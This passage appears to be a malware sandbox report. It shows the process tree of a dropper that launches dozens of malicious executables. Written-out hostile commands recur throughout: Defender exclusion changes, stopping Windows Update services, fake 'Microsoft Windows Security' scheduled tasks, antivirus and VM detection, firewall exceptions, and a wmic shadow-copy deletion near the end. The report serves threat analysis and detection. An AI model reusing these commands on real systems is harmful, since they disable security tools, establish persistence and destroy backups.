      "C:\Users\Admin\AppData\Local\Temp\Files\Token%20Gen.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: GetForegroundWindowSpam
      PID:1696
- - C:\Users\Admin\AppData\Local\Temp\Files\random.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\Files\pi.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:700
  - - C:\Windows\sysppvrdnvs.exe
      C:\Windows\sysppvrdnvs.exe
      4⤵
      Modifies security service
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      System Location Discovery: System Language Discovery
      PID:1616
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1792
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2316
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2464
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2152
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2924
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1332
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1056
    - - C:\Users\Admin\AppData\Local\Temp\227131299.exe
        
        C:\Users\Admin\AppData\Local\Temp\227131299.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2996
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:856
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:2832
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:2344
    - - C:\Users\Admin\AppData\Local\Temp\1201025448.exe
        
        C:\Users\Admin\AppData\Local\Temp\1201025448.exe
        5⤵
        Executes dropped EXE
        
        PID:572
    - - C:\Users\Admin\AppData\Local\Temp\427717387.exe
        
        C:\Users\Admin\AppData\Local\Temp\427717387.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2616
      - C:\Users\Admin\AppData\Local\Temp\2561810786.exe
        
        C:\Users\Admin\AppData\Local\Temp\2561810786.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        
        PID:2504
- - C:\Users\Admin\AppData\Local\Temp\Files\Vhpcde.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Vhpcde.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5452
- - C:\Users\Admin\AppData\Local\Temp\Files\discord.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\discord.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2708
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5324
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:5360
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5408
- - C:\Users\Admin\AppData\Local\Temp\Files\config.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\config.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5812
- - C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    PID:5864
- - C:\Users\Admin\AppData\Local\Temp\Files\client.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\client.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    PID:5904
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yghsn_az.cmdline"
      4⤵
      PID:6752
    - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEEE2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEEE1.tmp"
        5⤵
        
        PID:7144
- - C:\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe"
    3⤵
    - Executes dropped EXE
    PID:3140
- - C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe"
    3⤵
    PID:4504
- - C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
    3⤵
    PID:3844
- - C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"
    3⤵
    PID:3884
  - - C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"
      4⤵
      PID:1980
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
        5⤵
        
        PID:4092
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\NEWBUN~1.EXE"
    3⤵
    PID:1972
  - - C:\Users\Admin\AppData\Local\Temp\Files\NEWBUN~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\NEWBUN~1.EXE
      4⤵
      PID:2852
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CFXBYP~1.EXE"
    3⤵
    PID:5444
  - - C:\Users\Admin\AppData\Local\Temp\Files\CFXBYP~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\CFXBYP~1.EXE
      4⤵
      PID:5412
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe"
    3⤵
    PID:5528
  - - C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe
      C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe
      4⤵
      PID:5832
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"
    3⤵
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe
      C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe
      4⤵
      PID:5664
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im FLiNGTrainerUpdater.exe
        5⤵
        Kills process with taskkill
        
        PID:1084
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im FLiNGTrainer.exe
        5⤵
        Kills process with taskkill
        
        PID:3364
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"
    3⤵
    PID:1380
  - - C:\Users\Admin\AppData\Local\Temp\Files\builder.exe
      C:\Users\Admin\AppData\Local\Temp\Files\builder.exe
      4⤵
      PID:5604
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
    3⤵
    PID:2784
  - - C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
      C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
      4⤵
      PID:2808
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\FUSCA%~1.EXE"
    3⤵
    PID:4568
  - - C:\Users\Admin\AppData\Local\Temp\Files\FUSCA%~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\FUSCA%~1.EXE
      4⤵
      PID:5612
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\fusca%20game.exe" "FUSCA%~1.EXE" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:6432
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe"
    3⤵
    PID:6256
  - - C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe
      4⤵
      PID:764
    - - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "
        5⤵
        
        PID:4540
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get Model
        6⤵
        
        PID:6672
      - C:\Windows\system32\findstr.exe
        
        findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
        6⤵
        
        PID:6384
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\NORTHS~1.EXE"
    3⤵
    PID:2436
  - - C:\Users\Admin\AppData\Local\Temp\Files\NORTHS~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\NORTHS~1.EXE
      4⤵
      PID:1768
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k move Surrey Surrey.cmd && Surrey.cmd && exit
        5⤵
        
        PID:5188
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /k move Surrey Surrey.cmd && Surrey.cmd && exit
        6⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:6888
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        7⤵
        
        PID:7164
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4880
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
        7⤵
        
        PID:3900
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 719580
        7⤵
        
        PID:6836
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "copehebrewinquireinnocent" Corpus
        7⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Utilize + ..\Verzeichnis + ..\Built + ..\Vessels + ..\Cradle + ..\Jaguar + ..\Comics + ..\Flux + ..\Liberal f
        7⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\719580\Optimum.pif
        
        Optimum.pif f
        7⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        
        PID:5652
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\kitty.exe"
    3⤵
    PID:748
  - - C:\Users\Admin\AppData\Local\Temp\Files\kitty.exe
      C:\Users\Admin\AppData\Local\Temp\Files\kitty.exe
      4⤵
      PID:3996
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 188
        5⤵
        Program crash
        
        PID:4388
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"
    3⤵
    PID:6748
  - - C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
      C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
      4⤵
      PID:6832
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
    3⤵
    PID:7124
  - - C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
      C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
      4⤵
      PID:4288
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ASYNCC~1.EXE"
    3⤵
    PID:7000
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  PID:3008
- C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" shell32.dll,Options_RunDLL 7
  2⤵
  PID:1732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2376
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:2912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2312
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1568
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:600
- - C:\Windows\SysWOW64\netbtugc.exe
    "C:\Windows\SysWOW64\netbtugc.exe"
    3⤵
    PID:7368
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3572
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3640
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:3520
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  PID:4268
- - C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4856
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3900
- - C:\Users\Admin\AppData\Local\Temp\Files\RMS1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\RMS1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3512
- - C:\Users\Admin\AppData\Local\Temp\Files\kill.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\kill.exe"
    3⤵
    - Executes dropped EXE
    PID:3468
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:2652
- - C:\Users\Admin\AppData\Local\Temp\Files\js.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\js.exe"
    3⤵
    PID:4432
- - C:\Users\Admin\AppData\Local\Temp\Files\30072024.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\30072024.exe"
    3⤵
    PID:1588
- - C:\Users\Admin\AppData\Local\Temp\Files\t2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"
    3⤵
    PID:4136
  - - C:\Windows\sysklnorbcv.exe
      C:\Windows\sysklnorbcv.exe
      4⤵
      PID:5280
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        
        PID:3956
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2944
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        5⤵
        
        PID:3764
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3860
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:4600
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:2100
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        
        PID:5632
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        6⤵
        Launches sc.exe
        
        PID:5940
    - - C:\Users\Admin\AppData\Local\Temp\1129321710.exe
        
        C:\Users\Admin\AppData\Local\Temp\1129321710.exe
        5⤵
        
        PID:4836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:5156
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:3440
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:5328
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:3612
    - - C:\Users\Admin\AppData\Local\Temp\1453813444.exe
        
        C:\Users\Admin\AppData\Local\Temp\1453813444.exe
        5⤵
        
        PID:1576
    - - C:\Users\Admin\AppData\Local\Temp\14106099.exe
        
        C:\Users\Admin\AppData\Local\Temp\14106099.exe
        5⤵
        
        PID:3528
- - C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"
    3⤵
    PID:2196
  - - C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"
      4⤵
      PID:4984
- - C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe"
    3⤵
    PID:3544
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
      4⤵
      PID:1936
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:824
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        5⤵
        
        PID:5152
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2920
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        
        PID:3756
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 768318
        5⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "PhoneAbcSchedulesApr" Nbc
        5⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B
        5⤵
        
        PID:4528
    - - C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
        
        768318\Paraguay.pif 768318\B
        5⤵
        
        PID:4780
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit
        6⤵
        
        PID:5536
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:5256
- - C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
    3⤵
    PID:3604
- - C:\Users\Admin\AppData\Local\Temp\Files\whiteheroin.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\whiteheroin.exe"
    3⤵
    PID:4120
- - C:\Users\Admin\AppData\Local\Temp\Files\stories.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\stories.exe"
    3⤵
    PID:6056
  - - C:\Users\Admin\AppData\Local\Temp\is-D8485.tmp\stories.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-D8485.tmp\stories.tmp" /SL5="$302B6,5263804,721408,C:\Users\Admin\AppData\Local\Temp\Files\stories.exe"
      4⤵
      PID:6140
    - - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause avidenta_11131
        5⤵
        
        PID:4760
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause avidenta_11131
        6⤵
        
        PID:4692
    - - C:\Users\Admin\AppData\Local\Avidenta 2.7.7\avidenta.exe
        
        "C:\Users\Admin\AppData\Local\Avidenta 2.7.7\avidenta.exe" -i
        5⤵
        
        PID:4260
- - C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
    3⤵
    PID:1736
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Avos.exe"
    3⤵
    PID:3340
  - - C:\Users\Admin\AppData\Local\Temp\Files\Avos.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Avos.exe
      4⤵
      PID:4228
    - - C:\Windows\system32\cmd.exe
        
        cmd /c wmic shadowcopy delete /nointeractive
        5⤵
        
        PID:4652
